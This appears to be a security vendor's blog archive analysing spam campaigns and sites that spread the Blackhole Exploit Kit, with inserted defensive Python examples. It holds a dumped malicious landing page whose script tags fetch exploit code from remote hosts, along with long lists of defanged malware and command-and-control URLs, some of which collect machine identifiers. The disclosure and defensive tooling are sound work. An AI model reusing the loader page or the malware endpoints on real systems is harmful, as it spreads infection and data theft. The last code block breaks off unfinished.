Category Archives: Security

Express LinkedIn Mail: spam spreading Blackhole Exploit Kit URLs

We have received a few emails that looked like they were sent from LinkedIn:

[Image: screenshot of the email]

But after checking the email headers it was clearly spam:

Return-Path: trtro@www.trt.ro
Received: from vps136.whmpanels.com (unknown [89.42.219.181])
Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com
Date: Fri, 30 Mar 2012 21:37:47 +0100
From: "Support" trtro@www.trt.ro
Subject: Express LinkedIn Mail
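
Added example, not code from the original post: a small Python check of the kind the headers above call for. It compares the brand named in the subject against the sender's domain, the Return-Path against the From domain, and inspects each Received hop; the brand-to-domain mapping and the "last two labels" domain helper are assumptions, and this is no substitute for SPF/DKIM verification.

```python
"""Spot the mismatch between what a message claims and where it came from.

Added example, not code from the original post. The header block is constructed
from the fields quoted above; the brand-to-domain mapping and the heuristics are
assumptions for illustration, not a complete anti-spoofing check (no SPF/DKIM).
"""
import email
import re

# Constructed from the headers quoted in the post.
RAW_HEADERS = """\
Return-Path: trtro@www.trt.ro
Received: from vps136.whmpanels.com (unknown [89.42.219.181])
Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com
Date: Fri, 30 Mar 2012 21:37:47 +0100
From: "Support" trtro@www.trt.ro
Subject: Express LinkedIn Mail
"""

# Assumption: brands a genuine message would name, and the domains they send from.
BRAND_DOMAINS = {"linkedin": ("linkedin.com",)}

ADDR_RE = re.compile(r"[\w.+-]+@([\w.-]+)")


def registered_domain(host: str) -> str:
    """Last two labels of a host name (assumption: no public-suffix list)."""
    labels = host.lower().strip("<>[]").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def sender_domain(header_value: str) -> str:
    """Registered domain of the first e-mail address in a header, or ''."""
    m = ADDR_RE.search(header_value or "")
    return registered_domain(m.group(1)) if m else ""


def analyze_headers(raw: str) -> list:
    """Return human-readable findings; an empty list means nothing looked odd."""
    msg = email.message_from_string(raw)
    findings = []
    from_dom = sender_domain(msg.get("From", ""))
    rp_dom = sender_domain(msg.get("Return-Path", ""))
    claim_text = (msg.get("Subject", "") + " " + msg.get("From", "")).lower()

    # 1. Subject or display name invokes a brand the sender domain does not belong to.
    for brand, domains in BRAND_DOMAINS.items():
        if brand in claim_text and from_dom and from_dom not in domains:
            findings.append(f"mentions '{brand}' but sender domain is {from_dom}")

    # 2. Envelope sender (Return-Path) and header From disagree.
    if rp_dom and from_dom and rp_dom != from_dom:
        findings.append(f"Return-Path domain {rp_dom} != From domain {from_dom}")

    # 3. Received chain: a relay without reverse DNS, or a HELO name that does
    #    not belong to the host that actually relayed the message.
    for hop in msg.get_all("Received", []):
        if "(unknown [" in hop:
            findings.append(f"relay has no reverse DNS: {hop.split(' (')[0]}")
        m = re.search(r"helo=([\w.-]+)\) by ([\w.-]+)", hop)
        if m and registered_domain(m.group(1)) != registered_domain(m.group(2)):
            findings.append(f"HELO {m.group(1)} relayed by unrelated host {m.group(2)}")
    return findings


if __name__ == "__main__":
    for finding in analyze_headers(RAW_HEADERS):
        print("-", finding)
```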

The A HREF links in the email point to 3 different malicious URLs:

hxxp:// groupehydrogaz .com/20sZhJqa/index.html
hxxp:// dealerpos .com/uFj7A93z/index.html
hxxp:// hobbyconcept666.yellis .net/20sZhJqa/index.html

URLVoid reports:

http://www.urlvoid.com/scan/groupehydrogaz.com/
http://www.urlvoid.com/scan/dealerpos.com/
http://www.urlvoid.com/scan/hobbyconcept666.yellis.net/

The page content dumped from one of these malicious URLs looks like this:

[Image: dumped page content]

That content matches the landing-page style used to spread the Blackhole Exploit Kit.

Other malicious URLs are:

hxxp:// ftp.planitur .com.br/dyEmcL4N/js.js
hxxp:// quiztown .org/U2iBLpvu/js.js
hxxp:// wap .tl/8M6kMfpV/js.js
hxxp:// laspeziacaritas .it/1M4VoeVe/js.js

URLVoid reports:

http://www.urlvoid.com/scan/ftp.planitur.com.br/
http://www.urlvoid.com/scan/quiztown.org/
http://www.urlvoid.com/scan/wap.tl/
http://www.urlvoid.com/scan/laspeziacaritas.it/

Always pay attention when opening emails, whether from known or unknown senders:

1) Always analyze the email headers to see who really sent the email
2) Scan links with our service http://www.urlvoid.com/
3) Do not download unknown files
4) Avoid opening emails whose subject relates to pharmaceutical products
5) Avoid opening emails whose subject relates to sexual content
6) When an email claims to come from your bank, always call your bank before opening it

Spam “Your updated information is necessary” leads to Blackhole Exploit Kit

We have received various spam emails that simulate messages from the Better Business Bureau (BBB) but are really used to spread malicious links that lead to the Blackhole Exploit Kit. The subject of the emails looks like this:

Your updated information is necessary

A screenshot of the email:

[Image: screenshot of the email]

Other details of the emails:

Return-Path: <top-team3@ms16.hinet.net>
Received: from msr6.hinet.net (msr6.hinet.net [168.95.4.106])
Received: from ms16.hinet.net ([178.206.55.126])
Date: Thu, 26 Jan 2012 22:49:15 +1000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.7) Gecko/20100713 Lightning/1.0b2 Thunderbird/3.1.1
Subject: Your updated information is necessary

The link present in the email:

hxxp://app.alaskaoregonwe sternwashington.bbb.org/sbq

Redirects users to the malicious link:

hxxp://circutor .com/4ethe8ep/index.html

The dumped content of the malicious link is:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="hxxp://diamondservice.com .au/B0bifDVW/js.js"></script>
<script type="text/javascript" src="hxxp://therefugees.altervista .org/wqWcKZ8w/js.js"></script>
<script type="text/javascript" src="hxxp://www.rentacandle.com .au/4SvXUuz4/js.js"></script>
 
</html>
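
Added example, not from the original post: a Python scanner that recognises the landing-page shape shown above, a bare "WAIT PLEASE / Loading..." page whose only job is to load several external js.js files from eight-character directories on different hosts. The sample page is the dump above, still defanged; the thresholds in the verdict are assumptions.

```python
"""Flag HTML that matches the loader landing page quoted in the post: almost no
visible text plus several external scripts named js.js under a short random
directory, each on a different (compromised) host.

Added example, not from the original post. The sample is the dump shown above
(defanged with hxxp:// and spaces); the thresholds are assumptions.
"""
import re
from html.parser import HTMLParser

# The dump shown in the post, verbatim and still defanged.
SAMPLE_HTML = """<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="hxxp://diamondservice.com .au/B0bifDVW/js.js"></script>
<script type="text/javascript" src="hxxp://therefugees.altervista .org/wqWcKZ8w/js.js"></script>
<script type="text/javascript" src="hxxp://www.rentacandle.com .au/4SvXUuz4/js.js"></script>
</html>"""

# Shape of the injected loader paths in the post: /<8 alphanumerics>/js.js
LOADER_PATH = re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")


def refang(url: str) -> str:
    """Undo the post's defanging: hxxp -> http and drop the spaces in host names."""
    return re.sub(r"^hxxp", "http", url.replace(" ", ""))


class _Collector(HTMLParser):
    """Collect external script URLs and the page's visible text."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append(refang(src))

    def handle_data(self, data):
        if data.strip():
            self.text.append(data.strip())


def analyze_page(html: str) -> dict:
    """Return the collected evidence plus a boolean verdict under 'suspicious'."""
    c = _Collector()
    c.feed(html)
    hosts, loader_hits = set(), 0
    for url in c.scripts:
        m = re.match(r"https?://([^/]+)(/.*)?$", url)
        if not m:
            continue
        hosts.add(m.group(1).lower())
        if LOADER_PATH.match(m.group(2) or ""):
            loader_hits += 1
    visible = " ".join(c.text)
    suspicious = (
        loader_hits >= 2          # the same loader path shape on two or more scripts
        and len(hosts) >= 2       # spread over several hosts
        and len(visible) < 80     # a "please wait" shell with no real content
    )
    return {"scripts": c.scripts, "hosts": sorted(hosts), "loader_hits": loader_hits,
            "visible_text": visible, "suspicious": suspicious}


if __name__ == "__main__":
    print(analyze_page(SAMPLE_HTML))
```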

Extracted malicious links (active at the time of writing) that lead to the Blackhole Exploit Kit:

hxxp://diamondservice.com .au/B0bifDVW/js.js
hxxp://www.rentacandle.com .au/4SvXUuz4/js.js

We have analyzed the malicious link with our sandbox; the relevant entries of the report follow:

Malicious URLs extracted:

diamondservice .com.au - /B0bifDVW/js.js
matorbaron .com - /search.php?page=ac2393a35636dfa1
kosmovodki .ru - /statnl/image.php
matorbaron .com - /content/field.swf

As we can see, malicious code was injected into the system process wuauclt.exe, which then made its own network connections:

Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php

Blackhole Exploit Kit requests:

matorbaron .com - /search.php?page=ac2393a35636dfa1
matorbaron .com - /content/field.swf
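
Added example, not the sandbox's own code: a Python triage pass over report lines in the format above. It lists which hosts each process contacted and flags the two things the post points out, a system binary (wuauclt.exe) talking to a non-Microsoft host and the browser spawning java.exe. The sample lines are taken from the report; the lists of system binaries and vendor domains are assumptions.

```python
"""Triage a sandbox behaviour report: who talked to whom, and which of those
connections should not happen at all.

Added example, not the sandbox's own code. SAMPLE_REPORT is constructed from
lines of the report quoted in the post (host names keep the post's defanging
spaces); SYSTEM_BINARIES, VENDOR_DOMAINS and PLUGIN_HOSTS are assumptions.
"""
from collections import defaultdict

SAMPLE_REPORT = r"""
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - circutor .com - /4ethe8ep/index.html
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - diamondservice .com.au - /B0bifDVW/js.js
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron .com - /search.php?page=ac2393a35636dfa1
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - activex.microsoft .com - /objects/ocget.dll
Process Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %ProgramFiles%\Java\jre6\bin\java.exe - Sun Microsystems, Inc. - D600A0D8FACA5158CA8B221006997808 - 144792 bytes
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron.com - /content/field.swf
Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php
Web Request - C:\WINDOWS\explorer.exe - GET - www.microsoft .com - /isapi/redir.dll?prd=ie&pver=6&ar=msnhome
"""

# Assumptions: Windows binaries that have no business talking to arbitrary web
# hosts, the vendor domains they legitimately reach, and plug-in processes that
# a drive-by page typically gets the browser to launch.
SYSTEM_BINARIES = {"wuauclt.exe", "explorer.exe", "svchost.exe", "verclsid.exe"}
VENDOR_DOMAINS = ("microsoft.com", "windowsupdate.com", "msn.com")
PLUGIN_HOSTS = {"java.exe", "javaw.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path such as %ProgramFiles%\\...\\IEXPLORE.EXE."""
    return path.rsplit("\\", 1)[-1].lower()


def in_domains(host: str, domains) -> bool:
    """True if host equals or is a subdomain of one of the listed domains."""
    return any(host == d or host.endswith("." + d) for d in domains)


def normalize_host(host: str) -> str:
    """Remove the report's defanging spaces and lower-case the name."""
    return host.replace(" ", "").lower()


def triage(report: str) -> dict:
    """Parse ' - ' separated report lines; return findings and hosts per process."""
    findings = []
    hosts_by_process = defaultdict(set)
    for line in report.splitlines():
        parts = [p.strip() for p in line.split(" - ")]
        if len(parts) < 3:
            continue                      # blank line or an event we do not model
        kind, exe = parts[0], basename(parts[1])
        if kind == "Web Request" and len(parts) >= 5:
            method, host, path = parts[2], normalize_host(parts[3]), parts[4]
            hosts_by_process[exe].add(host)
            if exe in SYSTEM_BINARIES and not in_domains(host, VENDOR_DOMAINS):
                findings.append(f"{exe} {method} http://{host}{path}: system binary "
                                "contacting a non-vendor host (code injection suspected)")
        elif kind == "Process Created":
            child = basename(parts[2])
            if exe == "iexplore.exe" and child in PLUGIN_HOSTS:
                findings.append(f"{exe} spawned {child}: browser plug-in launched by the visited page")
    return {"findings": findings, "hosts_by_process": dict(hosts_by_process)}


if __name__ == "__main__":
    result = triage(SAMPLE_REPORT)
    for proc, hosts in result["hosts_by_process"].items():
        print(proc, "->", ", ".join(sorted(hosts)))
    for f in result["findings"]:
        print("!", f)
```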

Download dumped network traffic (password is urlvoid.com):

sniffed.zip / 17 KB

Sandbox: Malicious URLs

Below is a list of malicious URLs captured by our sandbox while analyzing a few recent malware samples. We highly recommend blocking these domains with a firewall and with the hosts file (C:\WINDOWS\system32\drivers\etc\hosts).

Hosts-file entries to insert into C:\WINDOWS\system32\drivers\etc\hosts to block the domains:

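Added example, not the post's own tooling: a Python script that turns the defanged URL-list format used in this post into hosts-file lines and separates two cases the hosts file cannot handle well: bare IP addresses (the hosts file only maps names, so those belong in firewall rules) and widely shared services such as dl.dropbox.com, where sinkholing the whole name breaks legitimate use. The sample URLs are a few from this post; the shared-service list is an assumption.

```python
"""Convert defanged malicious URLs (hxxp:// plus a space before the TLD, as in
the post) into hosts-file entries, keeping apart what the hosts file cannot
block (IP literals) and what it should not block outright (shared services).

Added example, not the post's own tooling. SAMPLE_URLS is constructed from URLs
in this post; SHARED_SERVICES is an assumption.
"""
import re
from urllib.parse import urlsplit

# Constructed from URLs listed in the post, still defanged.
SAMPLE_URLS = """\
hxxp://195.189.226.104/ftp/g.php
hxxp://outkxmkcxkxqqmy. org/news/?s=36052
hxxp://zz.cdbeta. com/wp-content/themes/g-white/style.css
hxxp://zz.cdbeta. com/wp-content/themes/g-white/js/all.js
hxxp://vip.cdbeta. com/yzm.asp
hxxp://dl.dropbox. com/u/44598175/pahtlar.txt
hxxp://the.veee.googlepages. com/U4z.exe
hxxp://78.189.218.14/zeus/config.bin
"""

# Assumption: names shared by many legitimate users. Sinkholing them in the
# hosts file breaks unrelated sites; block the specific URL at a proxy instead.
SHARED_SERVICES = ("dropbox.com", "googleapis.com", "googlepages.com", "googlegroups.com")

IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def refang(url: str) -> str:
    """Undo the post's defanging so urlsplit() can parse the URL."""
    url = url.replace(" ", "")
    return "http" + url[4:] if url.startswith("hxxp") else url


def hostname(url: str) -> str:
    """Host part of a (possibly defanged) URL, lower-cased; '' if unparsable."""
    return (urlsplit(refang(url)).hostname or "").lower()


def is_shared(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in SHARED_SERVICES)


def build_hosts_entries(url_list: str) -> tuple:
    """Return (hosts_lines, shared_hosts, ip_addresses) over the unique hosts."""
    seen = set()
    hosts_lines, shared, ips = [], [], []
    for line in url_list.splitlines():
        host = hostname(line.strip()) if line.strip() else ""
        if not host or host in seen:
            continue
        seen.add(host)
        if IPV4_RE.match(host):
            ips.append(host)            # the hosts file cannot block an IP: use the firewall
        elif is_shared(host):
            shared.append(host)         # review by hand instead of sinkholing the whole name
        else:
            hosts_lines.append(f"127.0.0.1 {host}")
    return hosts_lines, shared, ips


if __name__ == "__main__":
    lines, shared, ips = build_hosts_entries(SAMPLE_URLS)
    print("\n".join(lines))
    print("# firewall, not hosts file:", ", ".join(ips))
    print("# shared services, block the exact URL at a proxy:", ", ".join(shared))
```
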
URLVoid Reports:

Hidden Iframe in MineCraftForum.Net

Users have reported to us another website infected by a hidden iframe:

hxxp://www.minecraftforum.net/

All web pages are affected!

Here is an image of the hidden iframe at the bottom of the HTML pages:

[Image: hidden iframe at the bottom of the HTML pages]

When I visited the infected website, NoVirusThanks EXE Radar Pro displayed an alert about an unknown executable that tried to run on the system:

C:\Documents and Settings\User\Local Settings\Temp\scvhost.exe

Report date: 2011-06-22 11:34:41 (GMT 1)
File name: scvhost-exe
File size: 18944 bytes
MD5 hash: 5e71723d34d10648ed880af8e564f63b
SHA1 hash: 1af3dcb235e0a16eb58cebdbc0b9fb6316dc2f3b
Detection rate: 0 on 5 (0%)
Status: CLEAN

Thanks to NoVirusThanks EXE Radar Pro, I was able to block and delete the unknown and malicious executable file, preventing the system from being infected.

Some ASCII strings extracted from the PE file:

Type   RVA (hex)  Offset (hex)  Size (hex)  Value
ASCII  00006CE2   000040E2      0000000D    GuardCore.dll
ASCII  00006EBC   000042BC      00000024    hxxp://www.dashangu.com/new/getw.asp
ASCII  00006EFF   000042FF      00000006    server
ASCII  00006F14   00004314      0000000E    WTF\Config.wtf
ASCII  00006F24   00004324      0000000A    realmName
ASCII  00006F35   00004335      00000005    Right
ASCII  00006F4C   0000434C      00000024    hxxp://www.dashangu.com/new/getr.asp
ASCII  00006F74   00004374      00000011    JAGEXLAUNCHER.EXE
ASCII  00006F88   00004388      00000007    WOW.EXn
ASCII  00006F90   00004390      00000007    WinInet

URLVoid domain analysis:

http://www.urlvoid.com/scan/minecraftforum.net

16:38PM UPDATE:

The website appears to be under maintenance now, so it will probably be fixed soon.

Recent Malware URLs captured by NoVirusThanks Sandbox

These URLs are malicious or related to malware:

hxxp://xn.bisque110.com/lf
hxxp://122.770304123.cn/1.gif
hxxp://122.770304123.cn/ue000/38sw.e?uid=162678341112952317322438
hxxp://110.770304123.cn/1.gif
hxxp://110.770304123.cn/player/blog.updata?v=1.1.8.1&r1=0009a83babc21d46591d009e616da91a&tm=2011-06-12%2003:55:28&os=Windows%20XP.2600%20with%20Service%20Pack%202&uid=002678341112952317328300&cht=0
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=GO00&code2=0200&id=102678
hxxp://coursu.com/admin22/server[php]/config.bin
hxxp://ad79.co.kr/fie/sningal.exe
hxxp://114.200.199.251/fie/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=&install=1
hxxp://114.200.199.251/fie/liveins.php?mac=%MAC%&ip=%LANIP%&pid=
hxxp://iring4u.co.kr/favorbutton.php
hxxp://face-herault.org/images/ads/info.php
hxxp://lkrgn.ivepointedya.com/webyx/settings.cfg?build=501&os=XP
hxxp://network.emloud.com/webyx/iLog.php?dl=5.0&log=Loader%205.0%20~%20Ran
hxxp://consolewaspogad.com/czl/zlo.cl
hxxp://icvaircl.cn/dll/44.dll
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=2
hxxp://icvaircl.cn/update.db
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=4
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=9
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=11
hxxp://xylahavowi.com/1023000112
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JOM0&code2=4203
hxxp://jennifermusic.nl/logo2.jpg
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JOP0&code2=7203
hxxp://fastsearchportal.org/cfg/miniav.psd
hxxp://fastsearchportal.org/cfg/stopav.psd
hxxp://fastsearchportal.org/cfg/passw.psd
hxxp://fastsearchportal.org/pyvcu.php3
hxxp://fastsearchportal.org/ungtsmsuopstfsjjxaqhpksdi.phtml
hxxp://fastsearchportal.org/mccmkbawzojuijhsyttn.inc
hxxp://fastsearchportal.org/onqyofrbc.phtm
hxxp://myavava.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eHyF2e
hxxp://clashjamwallop.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrO
hxxp://adordota.com/bandwidth.bin
hxxp://einemenge.info/webpanel/alive.php?key=grills22&pcuser=%PCUSER%&pcname=%PCNAME%&hwid=%HWID%&country=Italy
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=KOR0&code2=9204
hxxp://JOSEMORAISTA.net/Machine.jpg
hxxp://JOSEMORAISTA.net/andeikyu.jpg
hxxp://mariadacoceicaopraxedes.net/GetString.aspx
hxxp://mariadacoceicaopraxedes.net/Query.aspx
hxxp://98.158.182.229/~milhomem/ver.txt?20110612045029
hxxp://mariadacoceicaopraxedes.net/COMCTL32.OCA.zip
hxxp://s350098374.onlinehome.us/mys.ini
hxxp://rmhpzusmfhtpnt.biz/news/?s=167674
hxxp://axvkxnuutylqdtu.com/news/?s=90742
hxxp://outoszjfvqtyonk.net/news/?s=24872
hxxp://114.200.199.251/vanir.php
hxxp://114.200.199.251/b7ins.php?mac=%MAC%&ip=%LANIP%&pid=vanir&setup=1
hxxp://114.200.199.251/b7liveins.php?mac=%MAC%&ip=%LANIP%&pid=vanir&app=
hxxp://privatesystem-softshieldprotect.com/favicon.ico?0=78&1=4&2=2&3=80&4=i-s
hxxp://212.150.164.204/flash/flashplayer.jpg
hxxp://www.increasingly.kr/Module/gomserv.exe
hxxp://www.increasingly.kr/Module/count.html?exec=gomserv.exe&instFile=gomserv.exe
hxxp://www.increasingly.kr/Module/count_live.html?exec=gomserv.exe
hxxp://windoslive.hotmail.ru/090043043543034877799.exe
hxxp://searchbehind.org/404.php?type=stats&affid=531&subid=03&iruns
hxxp://mygateforex.co.za/.sys.php?action=fbgen&v=1
hxxp://richardwiggers.com/.sys.php?action=fbgen&v=1
hxxp://www.obi-labs.com/.sys.php?action=fbgen&v=1
hxxp://www.obi-labs.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=0
hxxp://rvl.it/.sys.php?action=fbgen&v=1
hxxp://www.irishpub.fo/.sys.php?action=fbgen&v=1
hxxp://lets-exoticpets.co.za/.sys.php?action=fbgen&v=1
hxxp://lets-exoticpets.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=1
hxxp://slcsc.co.uk/.sys.php?action=fbgen&v=1
hxxp://voodoobarbcue.com/.sys.php?action=fbgen&v=1
hxxp://voodoobarbcue.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=2
hxxp://robertjakobsen.com/.sys.php?action=fbgen&v=1
hxxp://crosslinkhk.com/.sys.php?action=fbgen&v=1
hxxp://skybluephoto.com/.sys.php?action=fbgen&v=1
hxxp://3mates.com/.sys.php?action=fbgen&v=1
hxxp://3mates.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=3
hxxp://www.crabapplesound.com/.sys.php?action=fbgen&v=1
hxxp://www.crabapplesound.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=4
hxxp://kidnet.co.il/.sys.php?action=fbgen&v=1
hxxp://gulko.co.za/.sys.php?action=fbgen&v=1
hxxp://shieldteens.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=5
hxxp://pflco.com/.sys.php?action=fbgen&v=1
hxxp://pflco.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=6
hxxp://my-mobility.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=7
hxxp://emergencyshelter.us/.sys.php?action=fbgen&v=1
hxxp://emergencyshelter.us/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=8
hxxp://www.aandedoorns.co.za/.sys.php?action=fbgen&v=1
hxxp://ad79.co.kr/prex/taurus/taurus.exe
hxxp://ad79.co.kr/dico/sDico.exe
hxxp://ad79.co.kr/prex/taurus/staurus.exe
hxxp://114.200.199.251/version2.php
hxxp://114.200.199.251/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=taurus&install=1
hxxp://iring4u.co.kr/dico/dico.php
hxxp://iring4u.co.kr/dico/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=&install=1
hxxp://114.200.199.251/liveins.php?mac=%MAC%&ip=%LANIP%&pid=taurus
hxxp://iring4u.co.kr/dico/liveins.php?mac=%MAC%&ip=%LANIP%&pid=
hxxp://pc-guarrantor-utility.com/favicon.ico?0=80&1660=0&2=1&3000=82&4000=i-s
hxxp://key.91mt.com/diykey.php
hxxp://limpidoscomercio.com.br/GetString.aspx
hxxp://limpidoscomercio.com.br/Query.aspx
hxxp://98.158.182.229/~milhomem/ver.txt?20110612141104
hxxp://limpidoscomercio.com.br/COMCTL32.OCA.zip
hxxp://limpidoscomercio.com.br/COMCTL32.OCX.zip
hxxp://petchaburi.kr/kwd/hkwd.php
hxxp://petchaburi.kr/kwd/dkwd.php
hxxp://petchaburi.kr/check/check.php?m=b
hxxp://64.31.58.237/brn.txt
hxxp://64.31.58.237/brn.php
hxxp://key.91mt.com/list/getpmnum.asp?id=f9435d25636a746f
hxxp://key.91mt.com/list/getpmnum2.asp?id=f9435d25636a746f
hxxp://114.200.199.251/ngliveins.php?pmac=0&lmac=%MAC%&ip=%LANIP%&pid=taurus
hxxp://www.hyap98.com/123/mh.txt
hxxp://www.hyap98.com/123/rx.txt
hxxp://www.hyap98.com/123/wc.txt
hxxp://www.hyap98.com/123/wm.txt
hxxp://www.hyap98.com/123/wow.txt
hxxp://w.nucleardiscover.com:888/sn.php?c=DCC228CCD04021858368C8936B1023D74A8&t=9,005374E-02
hxxp://w.nucleardiscover.com:888/sn.php?c=18064AAE3FAF34908C67CC976A11E317&t=0,3627588
hxxp://searcham.org/404.php?type=stats&affid=531&subid=03&iruns
hxxp://s350098374.onlinehome.us/update.php
hxxp://key.91mt.com/list/getpmnum.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/getpmnum2.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/clickpm.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/getpmnum.asp?id=fa67a8111002230d
hxxp://key.91mt.com/list/getpmnum2.asp?id=fa67a8111002230d
hxxp://98.158.182.229/~milhomem/ver.txt?20110612154053
hxxp://ck3.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://w.nucleardiscover.com:888/sn.php?c=948A7D999D0D9733C5285903F882FB388219AB9DA&t=0,894787
hxxp://w.nucleardiscover.com:888/sn.php?c=E1FF76924BDB00A47B96A8F2F18B995A4AD1A593F&t=0,5531122
hxxp://58.150.174.222/baz001.jpg?t=0,8852045
hxxp://131207db062d.dynazzy.net/get2.php?c=TCBIJIJK&d=26606B67393437333F2F676268307D3F22202323
hxxp://w.nucleardiscover.com:888/sn.php?c=4E5018FC71E12DFFD2CFCA91DB93&t=0,2665522
hxxp://w.nucleardiscover.com:888/sn.php?c=1F01DE3AC95905D70C11B&t=0,5650751
hxxp://ru.coolnuff.com:2011/ck3.jpg?t=0,4463007
hxxp://w.nucleardiscover.com:888/sn.php?c=3B25E90DC1513CEEB45CC6EB96EEC230&t=0,7814447
hxxp://w.nucleardiscover.com:888/sn.php?c=918FA94D78E873A13CD4E5C8502&t=0,8195307
hxxp://ru.coolnuff.com:2011/ck4.jpg?t=0,3862421
hxxp://w.nucleardiscover.com:888/sn.php?c=F8E65FBB45D53793A54EFCA7C5BEEB&t=0,3606684
hxxp://xylahavowi.com/1023000112
hxxp://tekefihamib.com/10230001124255461742
hxxp://tekefihamib.com/buy.html

URLVoid domain analysis:


Malware: United Parcel Service notification #46034

Suspicious email spreading malware:

Return-Path: <info52943@ups.com>
Received: from [39.203.6.87] (account 1361@ms21.hinet.net HELO ybydypsmsb.cehflcrileuz.ru)
From: "United Parcel Service" <info52943@ups.com>
Subject: United Parcel Service notification #46034

Message:

May 2011
United Parcel Service
tracking number #18203

Good morning
Parcel notification
The parcel was sent your home adress. And it will arrive within 3 buisness days.
More information and the parcel tracking number are attached in document below.
Thank you
United Parcel Service of America (c)
153 James Street, Suite 100, Long Beach CA, 90000

Attached is a file with a ZIP extension:

Report date: 2011-06-14 11:44:18 (GMT 1)
File name: ups-document-zip
File size: 9032 bytes
MD5 hash: 4e8bbc81f8a1ed3fcde3899546fef0c9
SHA1 hash: 56e4f46e75cbccf27dde19289250471ebb90c5ba
Detection rate: 4 on 5 (80%)
Status: INFECTED

AVG 14/06/2011 10.0.0.1190 FakeAlert
Avira AntiVir 14/06/2011 7.11.7.12 TR/Crypt.XPACK.Gen
ClamAV 14/06/2011 0.97 Suspect.Bredozip-zippwd-10
Emsisoft 14/06/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The extracted file is an executable file:

Report date: 2011-06-14 11:44:18 (GMT 1)
File name: ups-document-exe
File size: 24576 bytes
MD5 hash: fed91182ed9d29e36bbabac211ac7d3a
SHA1 hash: 17f308da31c8d61dd0b33691bf474e6f6fb5afbe
Detection rate: 2 on 5 (40%)
Status: INFECTED

Avira AntiVir 14/06/2011 7.11.7.12 TR/Crypt.XPACK.Gen
Emsisoft 14/06/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

Report created by NoVirusThanks Automated Sandbox:


URLVoid domain analysis:

http://www.urlvoid.com/scan/miliardov.com
http://www.urlvoid.com/scan/searcham.org

IPVoid IP address analysis:

http://www.ipvoid.com/scan/85.202.146.77
http://www.ipvoid.com/scan/194.50.7.14
http://www.ipvoid.com/scan/95.64.36.67
http://www.ipvoid.com/scan/94.60.123.33
http://www.ipvoid.com/scan/94.60.123.34
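The headers quoted at the top of this post show the tell-tale pattern: From and Return-Path claim ups.com, while the hop that injected the message is a bare IP literal that introduced itself with an unrelated HELO name. The following Python is an added example, not code from the original post or from NoVirusThanks; the UPS and Bobijou samples are transcribed from this archive, the control message is constructed, and the `registrable()` helper is a deliberately crude stand-in for a Public Suffix List lookup.

```python
"""Triage of the kind of SMTP headers quoted in these posts: does the
claimed sender (From / Return-Path) agree with the hop that actually
handed the message in (the earliest Received header)?"""
import re
from email import message_from_string
from email.utils import parseaddr

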